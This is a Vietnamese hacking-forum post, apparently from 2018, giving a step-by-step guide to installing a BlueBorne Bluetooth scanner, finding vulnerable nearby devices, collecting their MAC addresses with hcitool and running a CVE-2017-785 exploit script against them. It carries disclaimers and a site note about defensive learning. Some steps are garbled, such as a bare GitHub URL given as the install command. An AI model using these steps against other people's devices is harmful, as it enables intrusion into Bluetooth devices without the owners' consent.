BlueBorne - Bluetooth Hacker : Cách cài đặt và sử dụng

Thảo luận trong 'Tools' bắt đầu bởi NgMSon, 12/01/18, 08:01 PM lúc 8:29 PM.

  1. NgMSon

    NgMSon Well-Known Member

    Tham gia: 22/03/17, 10:03 AM
    Bài viết: 530
    Đã được thích: 712
    Điểm thành tích:
    93
    [​IMG]

    [+] Chú ý : Mọi hậu quả bạn gây ra tôi sẽ không chịu trách nhiệm. Mong các bạn tận dụng vào việc học tập của mình.

    Trước hết để cài đặt công cụ này mọi người mở Terminal trên HĐH Linux và nhập lệnh :
    Mã:
    https://github.com/hook-s3c/blueborne-scanner
    Sau khi Download xong chúng ra sử dụng câu lệnh :
    Mã:
    cd blueborne–scanner
    Để hoàn tất bước chuẩn bị chúng ta cần câu lệnh :
    Mã:
    pip install –r ./requirements.txt
    upload_2018-1-12_20-24-15.png
    ( Kết quả như trong hình )

    Bước tiếp theo ta cần Set Quyền bằng câu lệnh :
    Mã:
    sudo chmod +x ./bluebornescan.py
    Vì công cụ này chạy yêu cầu có Bluetooth để Quét ,. ..v..v.. nên hãy bật Bluetooth.
    Mã:
    service bluetooth start
    Ok , chúng ta đã chuẩn bị xong , Bluetooth cũng đã được bật giờ thì đi vào bước tiến hành.
    Lưu ý : Công cụ này chỉ chạy trên Python phiên bản 2.x và hoàn toàn không thể hoạt động trên 3.x !
    Câu lệnh của chúng ta như sau
    Mã:
    python2.7 bluebornescan.py
    Ở dây tôi thu được kết quả là : Endasmu
    upload_2018-1-12_20-33-18.png
    ( Như hình )
    Như vậy thiết bị mẫu của tôi có chứa lỗ hổng và tên Bluetooth là : Endasmu

    Ok bước quét đã hoàn tất , giờ ta hãy chuẩn qua công đoạn lấy địa chỉ MAC
    Mã:
    hcitool scan
    Bước cuối cùng cũng là bước mà bạn cảm thấy háo hức nhất đó là : Thực hiện khai thác.
    Và bạn cần nhập :
    Mã:
    python CVE-2017-785.py TARGET = <Địa chỉ MAC vừa thu được>
    upload_2018-1-12_20-38-6.png

    Như vậy đã khai thác xong , các bạn đã thành công chưa ? Nếu rồi thì xin chúc mừng còn chưa hoặc sai ở đâu hãy sửa lại !!!

    Video

    Vì lâu không viết bài nên nếu thiếu xót ở đâu mong cả nhà góp ý ạ !!!
     
    Chỉnh sửa cuối: 13/01/18, 06:01 PM lúc 6:45 PM
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    trinhvanbang thích bài này.